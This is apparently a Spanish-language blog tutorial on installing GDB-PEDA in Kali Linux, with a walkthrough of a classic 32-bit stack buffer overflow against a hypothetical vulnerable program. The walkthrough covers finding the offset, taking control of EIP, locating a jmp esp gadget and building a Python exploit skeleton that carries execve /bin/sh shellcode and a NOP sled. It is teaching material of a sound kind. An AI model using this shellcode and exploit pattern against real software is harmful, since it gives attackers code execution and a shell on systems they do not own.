GDB-PEDA en Kali Linux: Guía Rápida

 

 https://www.onlinetis.com

GDB-PEDA en Kali Linux: Guía Rápida

GDB-PEDA (Python Exploit Development Assistance) es una herramienta esencial para la ingeniería inversa y el desarrollo de exploits, ya que transforma la interfaz austera de GDB en algo mucho más visual y fácil de leer.

Aquí tienes una guía rápida en español para instalarlo y los comandos que más vas a usar.

1. Instalación en Kali Linux

Para instalarlo, solo necesitas clonar el repositorio y configurar tu archivo .gdbinit. Abre una terminal y ejecuta:

Bash
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

La próxima vez que abras gdb, verás una interfaz colorida con registros, código y la pila (stack).

2. Comandos Principales (Diccionario Rápido)

Una vez dentro de GDB con PEDA, estos son los comandos que te salvarán la vida:

Navegación y Control

  • context: Muestra el panel principal (Registros, Código y Stack). Útil si la pantalla se ensucia.

  • checksec: Verifica las protecciones del binario (NX, Stack Canary, ASLR, PIE).

  • pattern create [tamaño]: Crea una cadena de caracteres única para encontrar el offset exacto en un desbordamiento de búfer (buffer overflow).

  • pattern offset [valor]: Te dice exactamente en qué posición ocurrió el choque.

Información del Sistema

  • vmmap: Muestra los segmentos de memoria y sus permisos (lectura, escritura, ejecución).

  • elfsymbol: Busca símbolos en el archivo ELF.

  • procinfo: Muestra información detallada del proceso en ejecución.

Búsqueda y Debugging

  • find [cadena]: Busca una cadena o dirección en la memoria.

  • ropgadget: Busca gadgets para ataques de Programación Orientada a Retornos (ROP).

  • strings: Extrae todas las cadenas de texto del binario.

3. Ejemplo de Flujo de Trabajo

  1. Cargar el programa: gdb ./mi_programa

  2. Poner un breakpoint: break main

  3. Correrlo: run

  4. Avanzar línea a línea: next (para saltar funciones) o step (para entrar en ellas).

  5. Ver memoria: x/wx $esp (ver el tope de la pila en formato hexadecimal).

¿Por qué usar PEDA?

A diferencia del GDB estándar, PEDA:

  • Colorea la salida, lo que facilita identificar qué registros han cambiado.

  • Desensambla automáticamente el código alrededor de la instrucción actual.

  • Muestra argumentos de funciones de forma clara cuando se realizan llamadas al sistema (syscalls).

     

    Vamos a realizar un ejercicio clásico de Buffer Overflow (desbordamiento de búfer) paso a paso.

    Imagina que tienes un programa vulnerable donde una variable "A" sobreescribe la dirección de retorno en la pila. El objetivo es tomar el control del flujo del programa.

    Paso 1: Crear el patrón de choque

    En lugar de adivinar cuántas "A" necesitamos para romper el programa, usamos PEDA para generar una cadena única.

    Bash
    gdb-peda$ pattern create 100

    Esto generará algo como: AAAABBBBCCCC.... Copia esa cadena.

    Paso 2: Ejecutar y causar el error

    Ejecutamos el programa y, cuando pida la entrada, pegamos la cadena larga.

    Bash
    gdb-peda$ run
(Pega la cadena aquí)

    El programa se detendrá con un error de Segmentation Fault. Verás que el registro EIP (el que dice qué instrucción sigue) tiene un valor extraño como 0x41424344.

    Paso 3: Calcular el Offset

    Aquí es donde PEDA brilla. Queremos saber exactamente en qué parte de nuestra cadena se encuentra el valor que cayó en EIP.

    Bash
    gdb-peda$ pattern offset 0x41424344

    PEDA te responderá algo como: "found at offset 64". Esto significa que después de 64 caracteres, los siguientes 4 controlan el destino del programa.

    Paso 4: Visualización de la Pila (Stack)

    Para entender qué está pasando, es vital ver cómo se ve la memoria en ese momento.

    ¿Qué estamos viendo?

    Al enviar más datos de los que el búfer puede soportar, los datos "desbordan" hacia arriba en la memoria, tapando la Return Address (dirección de retorno). Cuando la función termina, el procesador intenta "volver" a la dirección que nosotros escribimos.

    Paso 5: Verificación final

    Ahora que sabemos que el offset es 64, podemos probar si tenemos el control total enviando 64 "A"s y 4 "B"s.

    Python
    # En la terminal de Linux
python3 -c "print('A'*64 + 'BBBB')" > payload.txt

    Luego en GDB:

    Bash
    gdb-peda$ run < payload.txt

    Si el registro EIP ahora contiene 0x42424242 (el valor hexadecimal de BBBB), ¡felicidades!, tienes el control total del procesador.

    ¿Qué sigue?

    Ahora que controlas el EIP, el siguiente paso suele ser apuntar esa dirección hacia un Shellcode para obtener acceso a la terminal.


    Aquí es donde la teoría se convierte en magia. Una vez que controlas el registro EIP, necesitas decirle al programa: "No vuelvas a donde ibas, salta a mi código".

    Para lograr esto, el método más común es buscar una instrucción JMP ESP dentro del binario o de sus librerías. Esto funciona porque, en el momento del choque, el registro ESP (Stack Pointer) suele estar apuntando justo después de nuestra dirección de retorno, donde podemos poner nuestro Shellcode.

    Paso 1: Buscar el "Trampolín" (JMP ESP)

    Necesitamos una dirección de memoria que contenga la instrucción jmp esp. PEDA lo hace muy fácil con el comando asmsearch:

    Bash
    gdb-peda$ jmpcall esp

    Este comando buscará en todo el binario instrucciones tipo jmp esp o call esp. Verás una lista de direcciones como esta:

    0x08041234 : jmp esp

    Paso 2: Entender el Salto

    Como ves en el diagrama:

    1. Llenamos el búfer con basura (As).

    2. Sobreescribimos el EIP con la dirección del JMP ESP que encontramos (0x08041234).

    3. Inmediatamente después, ponemos nuestro Shellcode.

    4. Cuando el programa "muere", salta a esa dirección, ejecuta jmp esp y ¡pum!, aterriza en tu código.

    Paso 3: Construir el exploit final (Esqueleto)

    Usando Python, estructuramos el ataque. Supongamos que el offset era 64 y la dirección del salto es 0x08041234:

    Python
    import struct

offset = 64
# Convertimos la dirección a formato "Little Endian" (al revés)
jmp_esp = struct.pack("<I", 0x08041234)

# Un Shellcode básico (ejemplo: ejecuta /bin/sh)
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

payload = b"A" * offset + jmp_esp + shellcode

print(payload)

    Paso 4: Ejecución en GDB

    Guardamos eso en un archivo y lo lanzamos:

    Bash
    gdb-peda$ run < payload.bin

    Si todo sale bien, en lugar de un "Segmentation Fault", verás que se abre un nuevo proceso o una shell $.

    Un detalle importante: NOP Sled

    A veces, la memoria se mueve un poco. Para ser más precisos, solemos poner una "pista de aterrizaje" antes del shellcode usando NOPs (\x90). Es una instrucción que no hace nada, solo pasa a la siguiente.

    Tip: payload = basura + jmp_esp + (b"\x90" * 16) + shellcode

Location: España

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Imagen
  www.onlinetis.com   Hacking y ciberseguridad en kali linux con Fping Fping es un programa similar a ping que utiliza la solicitud de eco del Protocolo de Mensajes de Control de Internet (ICMP) para determinar si un host objetivo responde. fping se diferencia de ping en que permite especificar cualquier número de objetivos en la línea de comandos o un archivo con las listas de objetivos a los que se hará ping. En lugar de enviar a un objetivo hasta que se agote el tiempo de espera o responda, fping envía un paquete de ping y pasa al siguiente objetivo mediante un sistema de turnos rotatorios. Como instalar:  sudo apt install fping fping Enviar paquetes ICMP ECHO_REQUEST a los hosts de la red   fping6 Compatibilidad con versiones anteriores de fping anteriores a la versión 4.0 El comando fping en Kali Linux es una utilidad de red que se utiliza para enviar paquetes de ICMP (Protocolo de mensajes de control de Internet) a varios hosts de forma simultánea. A diferen...
LEER MAS »

Hacking y ciberseguridad en kali linux con atk6-thcping6

Imagen
www.onlinetis.com Hacking y ciberseguridad en kali linux con atk6-thcping6 Parece que estás interesado en usar atk6-thcping6 en Kali Linux. Esta herramienta es parte del conjunto de utilidades thc-ipv6 , diseñado para probar las debilidades del protocolo IPv6. Para usar atk6-thcping6 , primero necesitas tener instalado el paquete thc-ipv6 . En la mayoría de las distribuciones de Kali, ya viene preinstalado, pero si no, puedes instalarlo con el siguiente comando: Bash sudo apt install thc-ipv6 Una vez que lo tienes instalado, la sintaxis básica para atk6-thcping6 es: Bash atk6-thcping6 <interface> <target> [opciones] Aquí está el desglose de los argumentos y opciones más comunes: <interface> : La interfaz de red que usarás para enviar el paquete. Por ejemplo, eth0 , wlan0 , etc. <target> : La dirección IPv6 del objetivo al que quieres hacer ping. [opciones] : Puedes usar varias opciones para modificar el comportamiento del ping. La mejor manera de ver todas la...
LEER MAS »

Como utilizar Fierce en kali linux

Imagen
  www.onlinetis.com   Como utilizar Fierce en kali linux Fierce es un escáner semiligero que ayuda a localizar direcciones IP no contiguas y nombres de host en dominios específicos. Está pensado como precursor de nmap, unicornscan, nessus, nikto, etc., ya que todos ellos requieren que se conozca previamente el espacio IP buscado. No realiza exploits ni escanea internet indiscriminadamente. Está diseñado específicamente para localizar objetivos probables tanto dentro como fuera de una red corporativa. Dado que utiliza principalmente DNS, es frecuente encontrar redes mal configuradas que filtran el espacio de direcciones interno. Esto es especialmente útil en malware dirigido. Originalmente escrito por RSnake y otros en http://ha.ckers.org/. Se trata simplemente de una conversión a Python 3 para simplificar y modernizar el código base. Como instalar: sudo apt install fierce Escáner DNS que ayuda a localizar espacios de IP no contiguos y nombres de host contra dominios específico...
LEER MAS »